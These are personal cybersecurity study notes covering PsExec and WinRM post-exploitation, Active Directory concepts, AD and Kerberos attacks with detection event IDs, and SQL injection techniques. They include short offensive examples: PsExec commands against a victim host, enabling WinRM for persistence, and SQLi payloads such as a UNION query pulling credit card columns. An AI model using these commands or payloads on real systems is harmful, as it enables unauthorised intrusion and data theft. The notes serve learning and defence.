PsExec is one of the most powerful Sysinternals tools. You can use it to remotely execute anything that can run on a Windows command prompt. You can also use PsExec to modify Windows registry values, execute scripts, and connect a compromised system to another system. For attackers, one advantage of PsExec is that the output of the commands you execute is shown on your system (the local system) instead of on the victim’s system. This allows an attacker to remain undetected by remote users. TIP The PsExec tool can also copy programs directly to the victim system and remove those programs after the connection ceases.

Because of the -i option, the following PsExec command interacts with the compromised system to launch the calculator application, and the -d option returns control to the attacker before the launching of calc.exe is completed: PsExec \VICTIM -d -i calc.exe You can also use PsExec to edit registry values, which means applications can run with system privileges and have access to data that is normally locked. This is demonstrated in the following example: PsExec -i -d -s regedit.exe

Windows Remote Management (WinRM) for Post-Exploitation Tasks

Windows Remote Management (WinRM) gives you a legitimate way to connect to Windows systems. WinRM is typically managed by Windows Group Policy (which is typically used for managing corporate Windows environments).

WinRM can be useful for post-exploitation activities. An attacker could enable WinRM to allow further connections to the compromised systems and maintain persistent access. You can easily enable WinRM on a Windows system by using the following command: Enable-PSRemoting -SkipNetworkProfileCheck -Force This command configures the WinRM service to automatically start and sets up a firewall rule to allow inbound connections to the compromised system.

Post-Exploitation Privilege Escalation

privilege escalation is the act of gaining access to resources that normally would be protected from an application or a user. This results in a user gaining additional privileges beyond those that were originally intended by the developer of the application.

Vertical Privilege Escalation a lower-privileged user accesses functions reserved for higher-privileged users (such as root or administrator access).
Horizontal Privilege Escalation a regular user accesses functions or content reserved for other non-root or non-admin users. For instance, say that after exploiting a system, you are able to get shell access as the user omar. However, that user does not have permissions to read some files on the system. You then find that another user, hannah, has access to those files. You then find a way to escalate your privileges as the user hannah to access those files.

How to Cover Your Tracks

After compromising a system during a penetration testing engagement, you should always cover your tracks to avoid detection by suppressing logs (when possible), deleting user accounts that could have been created on the system, and deleting any files that were created. In addition, after a penetration testing engagement is complete, you should clean up all systems. As a best practice, you should discuss these tasks and document them in the rules of engagement document during the pre-engagement phase. The following are a few best practices to keep in mind during the cleanup process:

Delete all user accounts used during the test.
Delete all files, executable binaries, scripts, and temporary files from compromised systems. A secure deletion method may be preferred. NIST Special Publication 800-88, Revision 1: “Guidelines for Media Sanitization,” provides guidance for media sanitation. This methodology should be discussed with your client and the owner of the affected systems.
Return any modified systems and their configuration to their original values and parameters.
Remove all backdoors, daemons, services, and rootkits installed.
Remove all customer data from your systems, including attacking systems and any other support systems. Typically, you should do this after creating and delivering the penetration testing report to the client.

Steganography

Attackers can use [[Steganography]] for obfuscation, evasion, and to cover their tracks. Steganography involves hiding a message or any other content inside an image or a video file. To accomplish this task, you can use tools such as steghide.

[Vault: Root] Resources

Mon, 08 Dec 2025 08:56:33 GMT

Omar Santos's Cybersecurity resources - https://github.com/The-Art-of-Hacking/h4cker
TryHackMe
Hack The Box

Courses

Cisco Netacad - Introduction to Cybersecurity
Cisco Netacad - Ethical Hacker
Coursera - Google Cybersecurity Professional Certificate

[Vault: System Security] Active Directory

Mon, 08 Dec 2025 08:56:33 GMT

Active Directory is a directory service developed by Microsoft for Windows domain networks.

A Windows domain is a group of users and computers under the administration of a given business.

It stores information about network objects such as computers, users, and groups. It provides authentication and authorisation services, and allows administrators to manage network resources centrally.

Advantages:

Centralised identity management: All users across the network can be configured from Active Directory with minimum effort.
Managing security policies: You can configure security policies directly from Active Directory and apply them to users and computers across the network as needed.

AD Domain Service

The core of any Windows Domain is the Active Directory Domain Service (AD DS). This service acts as a catalogue that holds the information of all of the "objects" that exist on your network. The associated objects can include:

Users:

Individual accounts representing people or services
Users are one of the most common object types in Active Directory.
Users are one of the objects known as security principals, meaning that they can be authenticated by the domain and can be assigned privileges over resources like files or printers.
Users can be used to represent two types of entities:
People: users will generally represent persons in your organisation that need to access the network, like employees.
Services: you can also define users to be used by services like IIS or MSSQL. Every single service requires a user to run, but service users are different from regular users as they will only have the privileges needed to run their specific service.

Machines:

For every computer that joins the Active Directory domain, a machine object will be created.
Machines are also considered "security principals" and are assigned an account just as any regular user. This account has somewhat limited rights within the domain itself.

Security Groups:

Collections of users or other objects, often with specific permissions.
Security groups can provide an efficient way to assign access to resources on your network.
By using security groups, you can:
Assign user rights to security groups in Active Directory.
Assign permissions to security groups for resources.
Security groups are also considered security principals and, therefore, can have privileges over resources on the network.

Several groups are created by default in a domain that can be used to grant specific privileges to users. As an example, here are some of the most important groups in a domain:

|Security Group|Description| |---|---| |Domain Admins|Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.| |Server Operators|Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.| |Backup Operators|Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.| |Account Operators|Users in this group can create or modify other accounts in the domain.| |Domain Users|Includes all existing user accounts in the domain.| |Domain Computers|Includes all existing computers in the domain.| |Domain Controllers|Includes all existing DCs on the domain.|

AD architecture

The building blocks of an AD architecture include:

Domains:

Logical groupings of network resources such as users, computers, and services. They serve as the main boundary for AD administration and can be identified by their Domain Component and Domain Controller name. Everything inside a domain is subject to the same security policies and permissions.

Organisational Units (OUs):

OUs are containers within a domain that help group objects based on departments, locations or functions for easier management. Administrators can apply Group Policy settings to specific OUs, allowing more granular control of security settings or access permissions.
It is very typical to see the OUs mimic the business' structure, as it allows for efficiently deploying baseline policies that apply to entire departments.
Default containers created by Windows automatically:
- Builtin: Contains default groups available to any Windows host.
- Computers: Any machine joining the network will be put here by default. You can move them if needed.
- Domain Controllers: Default OU that contains the DCs in your network.
- Users: Default users and groups that apply to a domain-wide context.
- Managed Service Accounts: Holds accounts used by services in your Windows domain.

[!info] Security Groups vs OUs You are probably wondering why we have both groups and OUs. While both are used to classify users and computers, their purposes are entirely different:

OUs are handy for applying policies to users and computers, which include specific configurations that pertain to sets of users depending on their particular role in the enterprise. Remember, a user can only be a member of a single OU at a time, as it wouldn't make sense to try to apply two different sets of policies to a single user.

Security Groups, on the other hand, are used to grant permissions over resources. For example, you will use groups if you want to allow some users to access a shared folder or network printer. A user can be a part of many groups, which is needed to grant access to multiple resources.

Forest:

A collection of one or more domains that share a standard schema, configuration, and global catalogue. The forest is the top-level container in AD.

Trust Relationships:

Domains within a forest (and across forests) can establish trust relationships that allow users in one domain to access resources in another, subject to permission.

Combining all these components allows us to establish the Distinguished Name (DN) that an object belongs to within the AD. The structure of the name would be as follows:

DN=CN=John, OU=Management, DC=Bigcompany, DC=thm

Core Active Directory Components

Active Directory contains several key components that allow it to provide a wide range of services. Understanding these components will give one a clear picture of how AD supports administrative and security operations.

Domain Controllers (DCs): Domain Controllers are the servers that host Active Directory services. They store the AD database and handle authentication and authorisation requests, such as logging in users or verifying access to resources. Multiple DCs can exist within a domain for redundancy. When changes are made to AD (such as adding users or updating passwords), these changes are replicated across all DCs, ensuring that the directory remains consistent.
Global Catalog: The Global Catalog (GC) is a searchable database within AD that contains a subset of information from all objects in the directory. This allows users and services to locate objects in any domain in the forest, even if those objects reside in different domains.
LDAP (Lightweight Directory Access Protocol): AD uses this protocol to query and modify the directory. The protocol allows for fast searching and retrieving of information about objects such as users, computers, and groups.
Kerberos Authentication: The default authentication protocol used by AD provides secure authentication by using tickets rather than passwords.

Group Policy

One of Active Directory's most powerful features is Group Policy, which allows administrators to enforce policies across the domain. Group Policies can be applied to users and computers to enforce password policies, software deployment, firewall settings, and more.

Group Policy Objects (GPOs) are the containers that hold these policies. A GPO can be linked to the entire domain, an OU, or a site, giving the flexibility in applying policies. GPOs are simply a collection of settings that can be applied to OUs. GPOs can contain policies aimed at either users or computers, allowing you to set a baseline on specific machines and identities.

To configure GPOs, you can use the Group Policy Management tool.
To configure Group Policies, you first create a GPO under Group Policy Objects and then link it to the OU where you want the policies to apply. ![[attachments/Active-Directory-IMG-20260131120740107.png]]
Let's examine the Default Domain Policy to see what's inside a GPO. The first tab you'll see when selecting a GPO shows its scope, which is where the GPO is linked in the AD.
you can also apply Security Filtering to GPOs so that they are only applied to specific users/computers under an OU. By default, they will apply to the Authenticated Users group, which includes all users/PCs.
The Settings tab includes the actual contents of the GPO and lets us know what specific configurations it applies. As stated before, each GPO has configurations that apply to computers only and configurations that apply to users only.

eg: Ensure all users follow a strict password policy, enforcing minimum password lengths and complexity rules. Here is how it would be done:

Using the Run window, open Group Policy Management from your server by typing gpmc.msc.
Right-click your domain and select "Create a GPO in this domain, and Link it here". Name the new GPO "Password Policy".
Edit the GPO by navigating to Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Password Policy.
Configure the following settings:
- Minimum password length: 12 characters
- Enforce password history: 10 passwords
- Maximum password age: 90 days
- Password must meet complexity requirements: Enabled
Click OK, then link this GPO to the domain or specific OUs you want to target.

This policy will now be applied across the domain, ensuring all users meet these password requirements.

![[attachments/Active-Directory-IMG-20260131120740254.png|Creating and editing GPO settings for Password Policy.]]

GPO distribution

GPOs are distributed to the network via a network share called SYSVOL, which is stored in the DC. All users in a domain should typically have access to this share over the network to sync their GPOs periodically. The SYSVOL share points by default to the C:\Windows\SYSVOL\sysvol\ directory on each of the DCs in our network.

Once a change has been made to any GPOs, it might take up to 2 hours for computers to catch up. If you want to force any particular computer to sync its GPOs immediately, you can always run the following command on the desired computer: gpupdate /force

Delegation

One of the nice things you can do in AD is to give specific users some control over some OUs. This process is known as delegation and allows you to grant users specific privileges to perform advanced tasks on OUs without needing a Domain Administrator to step in.

Authentication Methods

When using Windows domains, all credentials are stored in the Domain Controllers. Whenever a user tries to authenticate to a service using domain credentials, the service will need to ask the Domain Controller to verify if they are correct. Two protocols can be used for network authentication in windows domains:

Kerberos: Used by any recent version of Windows. This is the default protocol in any recent domain.
NetNTLM: Legacy authentication protocol kept for compatibility purposes.

While NetNTLM should be considered obsolete, most networks will have both protocols enabled.

Kerberos Authentication

Kerberos authentication is the default authentication protocol for any recent version of Windows. Users who log into a service using Kerberos will be assigned tickets. Think of tickets as proof of a previous authentication. Users with tickets can present them to a service to demonstrate they have already authenticated into the network before and are therefore enabled to use it.

When Kerberos is used for authentication, the following process happens:

The user sends their username and a timestamp encrypted using a key derived from their password to the Key Distribution Center (KDC), a service usually installed on the Domain Controller in charge of creating Kerberos tickets on the network.

The KDC will create and send back a Ticket Granting Ticket (TGT), which will allow the user to request additional tickets to access specific services. The need for a ticket to get more tickets may sound a bit weird, but it allows users to request service tickets without passing their credentials every time they want to connect to a service. Along with the TGT, a Session Key is given to the user, which they will need to generate the following requests.

Notice the TGT is encrypted using the krbtgt account's password hash, and therefore the user can't access its contents. It is essential to know that the encrypted TGT includes a copy of the Session Key as part of its contents, and the KDC has no need to store the Session Key as it can recover a copy by decrypting the TGT if needed.

![[attachments/Active-Directory-IMG-20260131120740476.png|Kerberos step 1]]

When a user wants to connect to a service on the network like a share, website or database, they will use their TGT to ask the KDC for a Ticket Granting Service (TGS). TGS are tickets that allow connection only to the specific service they were created for. To request a TGS, the user will send their username and a timestamp encrypted using the Session Key, along with the TGT and a Service Principal Name (SPN), which indicates the service and server name we intend to access.

As a result, the KDC will send us a TGS along with a Service Session Key, which we will need to authenticate to the service we want to access. The TGS is encrypted using a key derived from the Service Owner Hash. The Service Owner is the user or machine account that the service runs under. The TGS contains a copy of the Service Session Key on its encrypted contents so that the Service Owner can access it by decrypting the TGS.

![[attachments/Active-Directory-IMG-20260131120740655.png|Kerberos step 2]]

The TGS can then be sent to the desired service to authenticate and establish a connection. The service will use its configured account's password hash to decrypt the TGS and validate the Service Session Key.

![[attachments/Active-Directory-IMG-20260131120740796.png|Kerberos step 3]]

NetNTLM Authentication

NetNTLM works using a challenge-response mechanism. The entire process is as follows:

![[attachments/Active-Directory-IMG-20260131120740930.png|NetNTLM authentication]]

The client sends an authentication request to the server they want to access.
The server generates a random number and sends it as a challenge to the client.
The client combines their NTLM password hash with the challenge (and other known data) to generate a response to the challenge and sends it back to the server for verification.
The server forwards the challenge and the response to the Domain Controller for verification.
The domain controller uses the challenge to recalculate the response and compares it to the original response sent by the client. If they both match, the client is authenticated; otherwise, access is denied. The authentication result is sent back to the server.
The server forwards the authentication result to the client.

Note that the user's password (or hash) is never transmitted through the network for security.

Note: The described process applies when using a domain account. If a local account is used, the server can verify the response to the challenge itself without requiring interaction with the domain controller since it has the password hash stored locally on its SAM.

Trees and Forests

When an organization needs to partition its network, perhaps due to legal compliance or the requirement for independent management by separate IT teams—using a single, overly large Active Directory structure becomes cumbersome and prone to errors.

To overcome this, Active Directory allows the integration of multiple domains. If these separate domains share a common, contiguous namespace (e.g., uk.company.local and us.company.local), they can be joined together to form a cohesive unit known as an Active Directory Tree. This allows for the network to be logically divided while maintaining a hierarchical relationship.

This partitioned structure gives us better control over who can access what in the domain. The IT people from the UK will have their own DC that manages the UK resources only. For example, a UK user would not be able to manage US users. In that way, the Domain Administrators of each branch will have complete control over their respective DCs, but not other branches' DCs. Policies can also be configured independently for each domain in the tree.

A new security group needs to be introduced when talking about trees and forests. The Enterprise Admins group will grant a user administrative privileges over all of an enterprise's domains. Each domain would still have its Domain Admins with administrator privileges over their single domains and the Enterprise Admins who can control everything in the enterprise.

The domains you manage can also be configured in different namespaces. Suppose your company continues growing and eventually acquires another company. When both companies merge, you will probably have different domain trees for each company, each managed by its own IT department. The union of several trees with different namespaces into the same network is known as a forest.

Trust Relationships

Although organizing domains into trees and forests creates excellent compartmentalization for management and resources, users in one domain often need to access resources in another.

To enable this cross-domain access, domains within trees and forests are connected using trust relationships. Simply put, a trust relationship allows you to grant a user from one domain (the trusted domain) permission to access resources on another domain (the trusting domain).

The most basic configuration is a one-way trust relationship. In a one-way trust, if Domain AAA (the trusting domain) trusts Domain BBB (the trusted domain), then users from BBB can be authorized to access resources located on AAA. It is crucial to note that the direction of a one-way trust is the opposite of the direction of resource access. If Domain A trusts Domain B, users from B can access A.
For mutual access, two-way trust relationships can be established, allowing users from either domain to be authorized to access resources on the other. By default, when multiple domains are joined together to form an AD Tree or Forest, a two-way trust relationship is automatically created between them. Establishing a trust relationship does not automatically grant access to all resources on the trusted domain. It merely creates the possibility of cross-domain authorization. The administrator must still explicitly decide which users or groups are actually authorized to access specific resources across the domains.

Common Active Directory Attacks

Adversaries are always looking for ways to breach and exploit Active Directory environments to destabilise and cause havoc to organisations. Working with Glitch to secure SOC-mas requires us to know common attacks and their mitigation measures.

Golden Ticket Attack

A Golden Ticket attack allows attackers to exploit the Kerberos protocol and impersonate any account on the AD by forging a Ticket Granting Ticket (TGT). By compromising the krbtgt account and using its password hash, the attackers gain complete control over the domain for as long as the forged ticket remains valid. The attack requires four critical pieces of information to be successful:

Fully Qualified Domain Name (FQDN) of the domain
SID of the domain
Username of an account to impersonate
KRBTGT account password hash

Detection for this type of attack involves monitoring for unusual activity involving the krbtgt

Event ID 4768: Look for TGT requests for high-privilege accounts.
Event ID 4672: This logs when special privileges (such as SeTcbPrivilege) are assigned to a user.

Pass-the-Hash

This type of attack steals the hash of a password and can be used to authenticate to services without needing the actual password. This is possible because the NTLM protocol allows authentication based on password hashes.

Key ways to mitigate this attack are enforcing strong password policies, conducting regular audits on account privileges, and implementing multi-factor authentication across the domain.

Kerberoasting

Kerberoasting is an attack targeting Kerberos in which the attacker requests service tickets for accounts with Service Principal Names (SPNs), extracts the tickets and password hashes, and then attempts to crack them offline to retrieve the plaintext password.

Mitigation for this type of attack involves ensuring that service accounts are secured with strong passwords, and therefore, implementing secure policies across the AD would be the defence.

Pass-the-Ticket

In a Pass-the-Ticket attack, attackers steal Kerberos tickets from a compromised machine and use them to authenticate as the user or service whose ticket was stolen.

This attack can be detected through monitoring for suspicious logins using Event ID 4768 (TGT request), especially if a user is logging in from unusual locations or devices. Additionally, Event ID 4624 (successful login) will reveal tickets being used for authentication.

Malicious GPOs

Adversaries are known to abuse Group Policy to create persistent, privileged access accounts and distribute and execute malware by setting up policies that mimic software deployment across entire domains. With escalated privileges across the domain, attackers can create GPOs to accomplish goals at scale, including disabling core security software and features such as firewalls, antivirus, security updates, and logging. Additionally, scheduled tasks can be created to execute malicious scripts or exfiltration data from affected devices across the domain.

To mitigate against the exploitation of Group Policy, GPOs need to be regularly audited for unauthorised changes. Strict permissions and procedures for GPO modifications should also be enforced.

Skeleton Key Attack

In a Skeleton Key attack, attackers install a malware backdoor to log into any account using a master password. The legitimate password for each account would remain unchanged, but attackers can bypass it using the skeleton key password.

Investigating an Active Directory Breach

Group Policy

As previously discussed in this task, Group Policy is a means to distribute configurations and policies to enrolled devices in the domain. For attackers, Group Policy is a lucrative means of spreading malicious scripts to multiple devices.

Reviewing Group Policy Objects (GPOs) is a great investigation step. In this section, we will use PowerShell to audit our GPOs. First, we can use the Get-GPO cmdlet to list all GPOs installed on the domain controller.

Listing all GPOs viaPowerShell

PS C:\Users\Administrator> Get-GPO -All


DisplayName      : Default Domain Policy
DomainName       : wareville.thm
Owner            : WAREVILLE\Domain Admins
Id               : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/14/2024 12:17:31 PM
ModificationTime : 10/14/2024 12:19:28 PM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 3, SysVol Version: 3
WmiFilter        :

DisplayName      : Default Domain Controllers Policy
DomainName       : wareville.thm
Owner            : WAREVILLE\Domain Admins
Id               : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus        : AllSettingsEnabled
Description      :
CreationTime     : 10/14/2024 12:17:31 PM
ModificationTime : 10/14/2024 12:17:30 PM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 1, SysVol Version: 1
WmiFilter        :

DisplayName      : SetWallpaper GPO
DomainName       : wareville.thm
Owner            : WAREVILLE\Domain Admins
Id               : d634d7c1-db7a-4c7a-bf32-efca23d93a56
GpoStatus        : AllSettingsEnabled
Description      : Set the wallpaper of every domain joined machine
CreationTime     : 10/30/2024 9:01:36 AM
ModificationTime : 10/30/2024 9:01:36 AM
UserVersion      : AD Version: 0, SysVol Version: 0
ComputerVersion  : AD Version: 0, SysVol Version: 0
WmiFilter        :

This would allow us to look for out-of-place GPOs. We can export a GPO to an HTML file for further investigation to make it easier to see what configurations the policy enforces. For this example, we will export the "SetWallpaper" GPO.

Please note that this is a demonstration GPO, and isn't present on the practical machine for today's task.

Exporting SetWallpaperGPO

PS C:\Users\Administrator> Get-GPOReport -Name "SetWallpaper" -ReportType HTML -Path ".\SetWallpaper.html"

Then, when opening the HTML file in the browser, we are presented with an overview of things such as:

When the policy was created and modified.
What devices or users the GPO applies to.
The permissions over the GPO.
The user or computer configurations that it enforces.

![[attachments/Active-Directory-IMG-20260131120741087.png|SetWallpaper GPO in a HTML report for easier analysis.]]

From the screenshot above, we can see that the policy sets the Desktop Wallpaper of devices using the image located in C:\THM.jpg on the domain controller.

Domains are naturally likely to have many GPOs. We can use the same Get-GPO cmdlet, with a bit of PowerShell-fu to list only those GPOs that were recently modified. This is a handy snippet because it highlights policies that were recently modified - perhaps by an attacker.

Listing recently modified GPOs

PS C:\Users\Administrator\Desktop> Get-GPO -All | Where-Object { $_.ModificationTime } | Select-Object DisplayName, ModificationTime

DisplayName                                ModificationTime
-----------                                ----------------
Default Domain Policy                      10/14/2024 12:19:28 PM
Default Domain Controllers Policy          10/14/2024 12:17:30 PM
SetWallpaper                               10/31/2024 1:01:04 PM

Event Viewer

Windows comes packaged with the Event Viewer. This invaluable repository stores a record of system activity, including security events, service behaviours, and so forth.

For example, within the "Security" tab of Event Viewer, we can see the history of user logins, attempts and logoffs. The screenshot below shows a record of the user "cmnatic" attempting to log into the device.

![[attachments/Active-Directory-IMG-20260131120741210.png|Records of a user logging in shown on the Event Viewer.]]

All categories of events are given an event ID. The table below provides notable event IDs for today's task.

| | | |---|---| |Event ID|Description| |4624|A user account has logged on| |4625|A user account failed to log on| |4672|Special privileges (i.e. SeTcbPrivilege) have been assigned to a user| |4768|A TGT (Kerberos) ticket was requested for a high-privileged account|

User Auditing

User accounts are a valuable and often successful method of attack. You can use Event Viewer IDs to review user events and PowerShell to audit their status. Attack methods such as password spraying will eventually result in user accounts being locked out, depending on the domain controller's lockout policy.

To view all locked accounts, you can use the Search-ADAccount cmdlet, applying some filters to show information such as the last time the user had successfully logged in.

Search-ADAccount -LockedOut | Select-Object Name, SamAccountName, LockedOut, LastLogonDate, DistinguishedName

Additionally, a great way to quickly review the user accounts present on a domain, as well as their group membership, is by using the Get-ADUser cmdlet, demonstrated below:

Listing all users and their groups usingPowerShell

PS C:\Users\Administrator\Desktop> Get-ADUser -Filter * -Properties MemberOf | Select-Object Name, SamAccountName, @{Name="Groups";Expression={$_.MemberOf}}

Name           SamAccountName Groups
----           -------------- ------
Administrator  Administrator  {CN=Group Policy Creator Owners,CN=Users,DC=wareville,DC=thm, CN=Domain Admins,CN=Users,DC=wareville,DC=thm, CN=Enterprise Admins,CN=Users,DC=wareville,DC=thm, CN=Schema ...
Guest          Guest          CN=Guests,CN=Builtin,DC=wareville,DC=thm
krbtgt         krbtgt         CN=Denied RODC Password Replication Group,CN=Users,DC=wareville,DC=thm
tryhackme      tryhackme      CN=Domain Admins,CN=Users,DC=wareville,DC=thm
DAVID          DAVID
James          James
NewAccount     NewAccount
cmnatic        cmnatic        {CN=Domain Admins,CN=Users,DC=wareville,DC=thm, CN=Remote Desktop Users,CN=Builtin,DC=wareville,DC=thm}

Reviewing PowerShell History and Logs

PowerShell, like Bash on Linux, keeps a history of the commands inputted into the session. Reviewing these can be a fantastic way to see recent actions taken by the user account on the machine.

On a Windows Server, this history file is located at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

![[attachments/Active-Directory-IMG-20260131120741306.png|Location of the PowerShell history file on the system.]]

You can use the in-built Notepad on Windows or your favourite text editor to review the PowerShell command history.

![[attachments/Active-Directory-IMG-20260131120741441.png|Contents of the PowerShell command logs.]]

Additionally, logs are recorded for every PowerShell process executed on a system. These logs are located within the Event Viewer under Application and Services Logs -> Microsoft -> Windows -> PowerShell -> Operational or also under Application and Service Logs -> Windows PowerShell. The logs have a wealth of information useful for incident response.

![[attachments/Active-Directory-IMG-20260131120741588.png|Event Viewer showing PowerShell logs recorded.]]

Resources

THM: AD
https://tryhackme.com/room/winadbasics

[Vault: Vulns & Attacks] Kerberos and LDAP-Based Attacks

Mon, 08 Dec 2025 08:56:33 GMT

Kerberos is an authentication protocol defined in RFC 4120 that has been used by Windows for a number of years. Kerberos is also used by numerous applications and other operating systems. The Kerberos Consortium’s website provides detailed information about Kerberos at https://www.kerberos.org. A Kerberos implementation contains three basic elements:

Client
Server
Key distribution center (KDC), including the authentication server and the ticket-granting server

Steps in Kerberos Authentication

Step 1. The client sends a request to the authentication server within the KDC.
Step 2. The authentication server sends a session key and a ticket-granting ticket (TGT) that is used to verify the client’s identity.
Step 3. The client sends the TGT to the ticket-granting server.
Step 4. The ticket-granting server generates and sends a ticket to the client.
Step 5. The client presents the ticket to the server.
Step 6. The server grants access to the client.

[[Active Directory]] uses Lightweight Directory Access Protocol (LDAP) as an access protocol. The Windows LDAP implementation supports Kerberos authentication. LDAP uses an inverted-tree hierarchical structure called the Directory Information Tree (DIT). In LDAP, every entry has a defined position. The Distinguished Name (DN) represents the full path of the entry.

Kerberos Attacks

Kerberos golden ticket attack

One of the most common attacks is the Kerberos golden ticket attack. An attacker can manipulate Kerberos tickets based on available hashes by compromising a vulnerable system and obtaining the local user credentials and password hashes. If the system is connected to a domain, the attacker can identify a Kerberos TGT (KRBTGT) password hash to get the golden ticket.

TIP Empire is a popular tool that can be used to perform golden ticket and many other types of attacks. Empire is basically a post-exploitation framework that includes a pure-PowerShell Windows agent and a Python agent. With Empire, you can run PowerShell agents without needing to use powershell.exe. You can download Empire and access demonstrations, presentations, and documentation at https://github.com/BC-SECURITY/Empire. Empire has a Mimikatz golden_ticket module, which can be used to perform a golden ticket attack. When the Empire Mimikatz golden_ticket module is run against a compromised system, the golden ticket is established for the user using the KRBTGT password hash.

Kerberos silver ticket attack

A similar attack is the Kerberos silver ticket attack. Silver tickets are forged service tickets for a given service on a particular server. The Windows Common Internet File System (CIFS) allows you to access files on a particular server, and the HOST service allows you to execute schtasks.exe or Windows Management Instrumentation (WMI) on a given server. In order to create a silver ticket, you need the system account (ending in $), the security identifier (SID) for the domain, the fully qualified domain name, and the given service (for example, CIFS, HOST). You can also use tools such as Empire to get the relevant information from a Mimikatz dump for a compromised system.

Unconstrained Kerberos delegation.

Another weakness in Kerberos implementations is the use of unconstrained Kerberos delegation. Kerberos delegation is a feature that allows an application to reuse the end-user credentials to access resources hosted on a different server. Typically you should allow Kerberos delegation only if the application server is ultimately trusted; however, allowing it could have negative security consequences if abused, and Kerberos delegation is therefore not enabled by default in Active Directory.

Kerberoasting

Another attack against Kerberos-based deployments is Kerberoasting. Kerberoasting is a post-exploitation activity that is used by an attacker to extract service account credential hashes from Active Directory for offline cracking. It is a pervasive attack that exploits a combination of weak encryption implementations and improper password practices. Kerberoasting can be an effective attack because the threat actor can extract service account credential hashes without sending any IP packets to the victim and without having domain admin credentials.

[Vault: Vulns & Attacks] SQLi

Mon, 08 Dec 2025 08:56:33 GMT

[[Languages/SQL]] injection (SQLi) vulnerabilities can be catastrophic because they can allow an attacker to view, insert, delete, or modify records in a database. In injection attack, the attacker inserts, or injects, partial or complete SQL queries via the web application. The attacker injects SQL commands into input fields in an application or a URL in order to execute predefined SQL commands.

An SQL Injection vulnerability allows an attacker to potentially execute malicious queries.

One of the first steps when you find SQL injection vulnerabilities is to understand when the application interacts with a database. This is typically done with web authentication forms, search engines, and interactive sites such as e-commerce sites. You can make a list of all input fields whose values could be used in crafting a valid SQL query. This includes trying to identify and manipulate hidden fields of POST requests and then testing them separately, trying to interfere with the query and to generate an error. As part of penetration testing, you should pay attention to HTTP headers and cookies. As a penetration tester, you can start by adding a single quote (‘) or a semicolon ( ; ) to the field or parameter in a web form. The single quote is used in SQL as a string terminator. If the application does not filter it correctly, you may be able to retrieve records or additional information that can help enhance your query or statement. You can also use comment delimiters (such as -- or / / ), as well as other SQL keywords, including AND and OR operands. Another simple test is to insert a string where a number is expected.

Basic SQLi prompt: xyz' or '1'='1

SQL Injection Categories

SQL injection attacks can be divided into the following categories:

In-band SQL injection: With this type of injection, the attacker obtains the data by using the same channel that is used to inject the SQL code. This is the most basic form of an SQL injection attack, where the data is dumped directly in a web application (or web page).
- eg: Error based, Union based
Out-of-band SQL injection: With this type of injection, the attacker retrieves data using a different channel. For example, an email, a text, or an instant message could be sent to the attacker with the results of the query; or the attacker might be able to send the compromised data to another system.
Blind (or inferential) SQL injection: With this type of injection, the attacker does not make the application display or transfer any data; rather, the attacker is able to reconstruct the information by sending specific statements and discerning the behavior of the application and database.
- eg: Time based, Boolean SQLi

Techniques

There are essentially five techniques that can be used to exploit SQL injection vulnerabilities:

Union operator: This technique is typically used when an SQL injection vulnerability allows a UNION statement to combine two SELECT statements into a single injected query.
Boolean: This is used to verify whether certain conditions are true or false.
Error-based technique: This is used to force the database to generate an error in order to enhance and refine an attack (injection).
Out-of-band technique: This is typically used to obtain records from the database by using a different channel. For example, it is possible to make an HTTP connection to send the results to a different web server or a local machine running a web service.
Time delay: It is possible to use database commands to delay answers. An attacker may use this technique when he or she doesn’t get output or error messages from the application. An attacker can use this method to verify that injected queries are valid.

Database Fingerprinting

In order to successfully execute complex queries and exploit different combinations of SQL injections, you must first fingerprint the database. The SQL language is defined in the ISO/IEC 9075 standard. However, databases differ from one another in terms of their ability to perform additional commands, their use of functions to retrieve data, and other features. When performing more advanced SQL injection attacks, an attacker needs to know what back-end database the application uses (for example, Oracle, MariaDB, MySQL, PostgreSQL).

One of the easiest ways to fingerprint a database is to pay close attention to any errors returned by the application, as demonstrated in the following syntax error message from a MySQL database:

  MySQL Error 1064: You have an error in your SQL syntax

The following is an error from a Microsoft SQL database:

Microsoft SQL Native Client error %u201880040e14%u2019
Unclosed quotation mark after the character string

The following is an error message from a Microsoft SQL Server database with Active Server Page (ASP):

Server Error in '/' Application

The following is an error message from an Oracle database:

ORA-00933: SQL command not properly ended

The following is an error message from a PostgreSQL database:

PSQLException: ERROR: unterminated quoted string at or near " ' " Position: 1 
or
Query failed: ERROR: syntax error at or near
" ' " at character 52 in /www/html/buyme.php on line 69.

If you are trying to fingerprint a database, and there is no error message from the database, you can try using concatenation, as shown here:

MySQL: 'finger' + 'printing'
SQL Server: 'finger' 'printing'
Oracle: 'finger'||'printing'
PostgreSQL: 'finger'||'printing'

Use the built in DATABASE() function in MySQL to return the current database data.

The UNION Exploitation Technique

The SQL UNION operator is used to combine the result sets of two or more SELECT statements, as shown here:

SELECT zipcode FROM h4cker_customers
UNION
SELECT zipcode FROM h4cker_suppliers;

By default, the UNION operator selects only distinct values. You can use the UNION ALL operator if you want to allow duplicate values. Attackers may use the UNION operator in SQL injections attacks to join queries. The main goal of this strategy is to obtain the values of columns of other tables. The following is an example of a UNION -based SQL injection attack:

SELECT zipcode FROM h4cker_customers WHERE zip=1 UNION ALL
SELECT creditcard FROM payments

We can use the UNION command to work out how many rows should be returned. by union select 1,2,3,4,5,..... . siince union only work with same no of columns this will give idea of the table. select * from articles where released=1 and id='0' union select 1,2,3,4;--' this will show 1,2,3,4 in the respective columns

Booleans in SQL Injection Attacks

The Boolean technique is typically used in blind SQL injection attacks. In blind SQL injection vulnerabilities, the vulnerable application typically does not return an SQL error, but it could return an HTTP 500 message, a 404 message, or a redirect. It is possible to use Boolean queries against an application to try to understand the reason for such error codes. eg: 1' AND 1-1#

Out-of-Band Exploitation

